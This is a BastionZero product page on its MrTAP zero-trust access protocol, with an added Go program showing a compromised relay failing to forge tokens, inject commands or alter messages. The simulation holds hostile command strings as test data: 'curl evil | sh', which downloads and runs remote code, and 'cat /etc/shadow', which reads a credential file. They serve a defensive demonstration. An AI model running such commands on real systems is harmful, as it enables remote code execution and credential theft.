Introducing the Multi Root Trustless Access Protocol (MrTAP)

BastionZero is built on a zero-trust cryptographic messaging protocol for remote access. It eliminates single points of compromise: no single party, BastionZero included, can authorize or alter access to your targets on its own. The protocol runs underneath the normal login and shell workflow, so you and your users never interact with it directly.


The BastionZero token

The BastionZero token carries signatures from two independent roots of trust: the BastionZero cloud service and your single sign-on (SSO) provider. A target validates each access against both roots and honors it only if both signatures verify, so neither BastionZero's cloud service nor your SSO becomes a single point of compromise for your infrastructure.

The user's key

Each time a user Alice logs into BastionZero, her client generates a fresh key pair and stores the private key locally on her machine. Her public key is then certified (in the BastionZero token) by the two roots of trust: the BastionZero cloud service and the SSO. Alice signs every message to a target with her private key, which the cloud service never holds. This ensures that our cloud service cannot tamper with Alice's messages or inject its own commands to your targets.

The message exchange

Our cloud service relays traffic but is not granted privileged access to your targets. Every message in the MrTAP protocol includes the hash of the previous message and the signature of the dispatching party, and the target checks both before acting. An altered message fails signature verification, an injected message lacks a signature from the key certified in the token, and a dropped or reordered message breaks the hash chain. This prevents the cloud service from altering messages or injecting its own commands; the most it can do is stop delivering them.
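The following Go program is an added, self-contained model of the two mechanisms described above (the two-root token and the hash-chained, signed message exchange). It is not BastionZero's code and does not reproduce the real MrTAP wire format: the use of Ed25519, the `mrtap-example-cert:` domain separator, both roots signing the user's raw public key, and the field layouts are all assumptions made for this example. It walks through an honest login and session, then three things a compromised cloud service might try: forging a token, injecting a command, altering a command in transit, and dropping a message.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Added example, not BastionZero code. Wire format and domain separator are assumptions.
const certPrefix = "mrtap-example-cert:"

// Token: the user's fresh public key, certified by both roots of trust.
type Token struct {
	UserPub  ed25519.PublicKey
	CloudSig []byte // produced by the BastionZero cloud service's key
	SSOSig   []byte // produced by the SSO / identity provider's key
}

func certBytes(pub ed25519.PublicKey) []byte { return append([]byte(certPrefix), pub...) }

// IssueToken models each root certifying the user's key independently.
func IssueToken(userPub ed25519.PublicKey, cloudPriv, ssoPriv ed25519.PrivateKey) Token {
	return Token{UserPub: userPub,
		CloudSig: ed25519.Sign(cloudPriv, certBytes(userPub)),
		SSOSig:   ed25519.Sign(ssoPriv, certBytes(userPub))}
}

// VerifyToken is the target's check: BOTH roots must have certified the key.
func VerifyToken(t Token, cloudRoot, ssoRoot ed25519.PublicKey) bool {
	if len(t.UserPub) != ed25519.PublicKeySize {
		return false
	}
	return ed25519.Verify(cloudRoot, certBytes(t.UserPub), t.CloudSig) &&
		ed25519.Verify(ssoRoot, certBytes(t.UserPub), t.SSOSig)
}

// Message: hash of the previous message plus payload, signed by the dispatching party.
type Message struct {
	PrevHash [32]byte
	Payload  []byte
	Sig      []byte
}

func signedBytes(m Message) []byte { return append(append([]byte{}, m.PrevHash[:]...), m.Payload...) }
func messageHash(m Message) [32]byte { return sha256.Sum256(append(signedBytes(m), m.Sig...)) }

// Sender (Alice's client) chains each message to the last one it sent and signs it.
type Sender struct {
	priv ed25519.PrivateKey
	last [32]byte // all-zero for the first message of the session
}

func (s *Sender) Send(payload []byte) Message {
	m := Message{PrevHash: s.last, Payload: payload}
	m.Sig = ed25519.Sign(s.priv, signedBytes(m))
	s.last = messageHash(m)
	return m
}

// Receiver (the target) accepts a message only if it follows the last accepted one
// and is signed by the key certified in the token.
type Receiver struct {
	userPub ed25519.PublicKey
	last    [32]byte
}

func (r *Receiver) Accept(m Message) error {
	if m.PrevHash != r.last {
		return errors.New("chain break: message does not follow the last accepted one")
	}
	if !ed25519.Verify(r.userPub, signedBytes(m), m.Sig) {
		return errors.New("bad signature: not signed by the certified user key")
	}
	r.last = messageHash(m)
	return nil
}

// Outcome records what the target decided in each step of the scenario.
type Outcome struct {
	GoodTokenAccepted, CloudOnlyTokenAccepted                             bool
	UserMsgsAccepted, InjectedAccepted, TamperedAccepted, AfterDropAccepted bool
}

// RunScenario: an honest login and session, then attacks by a compromised cloud service.
func RunScenario() Outcome {
	cloudPub, cloudPriv, _ := ed25519.GenerateKey(rand.Reader)
	ssoPub, ssoPriv, _ := ed25519.GenerateKey(rand.Reader)
	userPub, userPriv, _ := ed25519.GenerateKey(rand.Reader) // Alice's fresh per-login key
	var o Outcome

	tok := IssueToken(userPub, cloudPriv, ssoPriv) // honest login: both roots certify Alice's key
	o.GoodTokenAccepted = VerifyToken(tok, cloudPub, ssoPub)

	// A compromised cloud can sign with its own root but cannot produce the SSO's signature.
	evilPub, _, _ := ed25519.GenerateKey(rand.Reader)
	forged := IssueToken(evilPub, cloudPriv, cloudPriv) // second signature is NOT from the SSO
	o.CloudOnlyTokenAccepted = VerifyToken(forged, cloudPub, ssoPub)

	alice, target := &Sender{priv: userPriv}, &Receiver{userPub: tok.UserPub}
	m1, m2 := alice.Send([]byte("ls -la")), alice.Send([]byte("whoami"))
	o.UserMsgsAccepted = target.Accept(m1) == nil && target.Accept(m2) == nil

	// Attack 1: inject a command, correctly chained but signed with the cloud's own key.
	inject := Message{PrevHash: target.last, Payload: []byte("curl evil | sh")}
	inject.Sig = ed25519.Sign(cloudPriv, signedBytes(inject))
	o.InjectedAccepted = target.Accept(inject) == nil

	// Attack 2: alter Alice's next command in transit; her signature no longer matches.
	m3 := alice.Send([]byte("cat /etc/hostname"))
	tampered := m3
	tampered.Payload = []byte("cat /etc/shadow")
	o.TamperedAccepted = target.Accept(tampered) == nil

	// Attack 3: drop m3 and forward m4; the target sees the chain break.
	m4 := alice.Send([]byte("exit"))
	o.AfterDropAccepted = target.Accept(m4) == nil
	return o
}

func main() { fmt.Printf("%+v\n", RunScenario()) }
```

Running it prints an `Outcome` in which only the honest token and Alice's own messages are accepted. The chain break in the last step is the flip side of the "drop messages" capability described in the FAQ below: a relay that withholds a message can deny service, but cannot splice in its own traffic without the target noticing.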

Frequently asked questions

What if BastionZero is compromised?

If BastionZero's cloud service is compromised, the adversary's options are limited. The adversary can drop messages as they traverse the cloud service, but cannot execute commands or set up tunnels to a target. Every access must also carry a valid signature from your identity provider (SSO), and the attacker cannot produce one without a valid user account there. Targets validate each access against the SSO, so if the SSO has not validated the access, the target will not accept the connection.

What if the user’s SSO is compromised?

An attacker holding a valid SSO identity still needs the BastionZero cloud service's signature on the token, which is gated by the user's independent MFA to the BastionZero cloud service. Targets remain secure as long as that second, independent factor is not also compromised.

What if BastionZero and the user’s SSO are both compromised?

Only an adversary who compromises both the BastionZero cloud service and a valid user's SSO identity can reach your targets. This scenario is improbable because it requires compromising multiple independent systems: BastionZero's cloud service AND your SSO. That increase in attack complexity is the intended consequence of the MrTAP protocol, which uses multiple roots of trust to eliminate single points of compromise.

Who designed and built your protocol?

We did. Our team includes multiple PhD cryptographers who have collectively authored over 30 peer-reviewed papers in security and cryptography. You can learn more about our protocol by reading our whitepaper or visiting our open-source repositories!

See it for yourself.

Sign up for a demo.

